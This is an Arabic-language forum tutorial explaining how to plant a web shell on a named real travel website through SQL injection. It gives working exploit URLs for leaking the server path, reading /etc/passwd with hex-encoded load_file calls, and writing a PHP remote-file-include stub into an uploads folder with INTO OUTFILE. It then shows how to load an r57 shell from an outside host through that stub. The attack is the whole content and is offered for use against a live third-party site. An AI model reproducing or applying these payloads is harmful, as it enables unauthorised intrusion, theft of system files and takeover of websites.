السلام عليكم ورحمة الله وبركاته
كيفكم ياشباب الليوم انا جايب لكم .....
شرح رفع shell عن طريق الحقن
الموقع الهدف
http://www.travellingbirder.com
المسار المصاب
http://www.travellingbirder.com/trip...ort.php?id=206
الاعمدة = 20
http://www.travellingbirder.com/trip...16,17,18,19,20
لازم نعرف مسارنا باللوحة وهذي لها طريقتين
الطريقة الاولى : من خطأ الاستعلام نفسه
http://www.travellingbirder.com/trip....php?id=206%27
رسالة الخطا
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/travellingbirder.com/public_html/tripreports/view_birding_tripreport.php on line 9
هذا هو المسار : /var/www/travellingbirder.com/public_html/tripreports/
طيب فرضا ما طلع لنا المسار في رسالة الخطأ .. وش نسوي
نسوي الطريقة الثانية وهي قراءة ملف passwd الموجود بمجلد etc لكن مو في كل الاوقات ينقرا لكن
لو تبي تعرف كيف تقرأ الملفات بشكل عام تابع الشرح أنا راح احاول قراءة
/etc/passwd
v
v
v
بعد ما عرفنا المسار نتحقق من الـ magic cotes انها غير مفعلة ( off) باستخدام دالة
load_file('/PATH/FILE')
http://www.travellingbirder.com/trip...,9,10,11,12,13,load_file('/etc/passwd'),15,16,17,18,19,20
ظهر لنا خطأ وهذا يعني انها مفعلة magic cotes = ON
كنا أول نقول اترك الموقع و دور غيره .. لكن الحين انا جبت لكم طرق تجربوها ممكن تنفع يعني نبقى اطول فترة ممكنة في الحقن (ممكن تنجح وممكن لا ) .. انا منزل الموضوع للفائدة ..
نروح لبرنامج CODER و نشفر المسار بالـ HEX
http://www.4shared.com/get/eLdOMF64/..._by_coder.html
أو نشفره CHAR()باستخدام اضافة الـ HACKBAR للـ FIREFOX
https://addons.mozilla.org/en-US/firefox/addon/3899/
انا افضل التشفير بالـ HEX
طبعا احنا راح نشفر الجزء هذا من الاستغلال
'/etc/passwd'
تشفيره بالـ HEX = 272F6574632F70617373776427
ننسخه ونلصقه مع بعض التعديلات
load_file(0x272F6574632F70617373776427)
مسحنا علانات التنصيص ..لاننا شفرناها مع المسار و حطينا
0x
قدام قيمة الهكس
نشوف كيف صار الاستغلال
http://www.travellingbirder.com/trip...,9,10,11,12,13,load_file%280x272F6574632F70617373776427%29,15,16,17,18,19,20
زال الخطأ .. لوووول
لكن .. ماطلعت محتويات الملف :(
الحين حلينا المشكلة .. خلونا نكمل الشرح حتى رفع الشيل
الحين احنا نبي نسوي ثغرة RFI
Remote File Include
هذا هو كود الثغرة
<?include("$rfi"); ?>
المتغير المصاب هو rfi
نحطها مكان
load_file(0x272F6574632F70617373776427)
بهذا الشكل
“<?include("$rfi"); ?>”
نشفرها
0x223C3F696E636C75646528222472666922293B203F3E22
ونروح لنهاية الاستغلال ونكتب
into+outfile+'path/777/myfile.*'
path = مسارنا ع الموقع
777 = مجلد مصرح 777 ( طبعا أحيانا ماينفع ... وتحط الملف اللي تبيه (لازم يكون ملف جديد ) مباشرة بعد المسار)
myfile.* = ملف جديد وبالامتداد اللي يعجبك
نشوف مجلد تصريحه 777
المواقع اللي فيها صور او ملفات غالبا يكون مكان رفعها مصرح بـ 777 كي يتمكن مدير الموقع من الرفع .. اذا الطريقة سهلة جدا
نروح لاقرب صورة أو ملف و click يمين ونختار properties او view image info
او اي شي يوصلك لمكان الصورة او الملف
انا حصلت صورة و طلعت مرفوعة في مجلد اسمه uploads
الحين تمام .. نعرف المسار .. و نعرف مجلد مصرح 777 بقي الملف .. نحط اسم أي ملف من راسنا أنا بأخليه deva.php
into+outfile+'/var/www/travellingbirder.com/public_html/tripreports/uploads/deva.php'
لازم تبعد الاعمدة اللي ظاهرة في الخطا مع العمود اللي انت شغال عليه و هذا يكون انك تستبدلها بـ null
ويصير الرابط النهائي .. هكذا
http://www.travellingbirder.com/trip...UNION+SELECT+1,null,3,null,null,null,null,null,null,10,11,12,13,0x223C3F696E636C75646528222472666922293B203F3E22,15,null,17,18,19,20+into+outfile+'/var/www/travellingbirder.com/public_html/tripreports/deva.php'
للاسف طلع لي خطأ .. وهذي المشكلة ما تنحل وكثيرا ما تواجهك لان اصلا نادرة المواقع اللي تغلق الماجيك كوتس .. لانك لو تقول نشفر المسار بالهكس اقول ما يضبط لان الهكس راح يعتبر انه هوه اسم الملف ..
نفترض انه مشى معنا وما طلع الخطا .. في هذي الحالة .. نروح لرابط اللف اللي سويناه
http://www.travellingbirder.com/trip...loads/deva.php
لو طلع رسالة مكتوب فيها error 404
يعني الملف ما انشئ وهنا نعرف ان الماجيك كوتس منعته .. ونجر أذيال الهزيمة .. :(
ونروح ندور ثغرة ثانية أو نكمل الحقن ونجيب اليوزر والباس واللوحة ونرفع الشل من اللوحة إذا ممكن
أما لو ما جانا error 404 يعني ان الملف تم انشاؤه بنجاح نروح نستغل تغرة RFI هكذا
http://www.travellingbirder.com/trip...oads/deva.php?rfi=http://saldiri.org/r57.txt?
deva.php = الملف المصاب اللي سويناه
rfi = المتغير المصاب اللي سويناه
http://saldiri.org/r57.txt = موقع مرفوع عليه شيل خام بصيغة txt
? = دالة تشغيل ملف php لازم تكتب بنهاية الرابط وإلا ما راح يعمل معك الشيل
وكذا انهينا الشرح ..
ملاحظات ::::
اولا جرب الاوامر العادية قبل ما تشفر .. ولو نتج لك خطأ في هذي الحالة شفر الاوامر
ثانيا المسار اللي يجي بعد دالة into outfile '' لايشفر أبدا لو ظهر لك خطا اترك الطريقة هذي ولو ما ظهر الخطا هذا يعني انه تم انشاء الملف بنجاح
ثالثا لو ظهر لك أعمدة أخرى مع العمود المصاب اجعلها null وإلا ستكتب في الملف مع كود الثغرة وتخرب عليك شغلك
عشان كذا كان استغلالي هكذا
http://www.travellingbirder.com/trip...ports/deva.php'
بالنسبة لعرض محتويات الملفات اللي طلبناها بدالة
load_file('/path/file')
لازم يكون العمود اللي نختاره عمود نصي .. يعني يجي مكان نص مكتوب
لو كان عمود لعرض صورة فلن تظهر المعلومات ..فقط يختفي الخطأ
.. وسلامتكم ..
الشرح للاخ المحترم The DeVaStAtOr
vtu shell uk 'vdr hgprk